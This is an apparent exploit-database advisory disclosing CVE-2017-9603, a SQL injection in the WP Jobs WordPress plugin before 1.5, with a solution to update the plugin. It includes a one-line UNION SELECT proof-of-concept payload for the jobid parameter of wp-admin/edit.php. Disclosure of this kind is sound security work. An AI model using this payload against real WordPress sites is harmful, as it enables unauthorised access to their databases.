WordPress Jobs 1.4 SQL Injection

WordPress Jobs plugin version 1.4 suffers from a remote SQL injection vulnerability.

MD5 | faef10178334d5adfc13d10633e57a30

# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
# Date: 11-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
# Vendor Homepage: http://www.intensewp.com/
# Version: 1.4
# CVE : CVE-2017-9603
# Category: webapps

1. Description:

SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
allows authenticated users to execute arbitrary SQL commands via the jobid
parameter to wp-admin/edit.php.

2. Proof of Concept:

obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment

3. Solution:

A new version of WP Jobs is available. Update the WordPress WP Jobs to the
latest version.

4. Reference:



Related Posts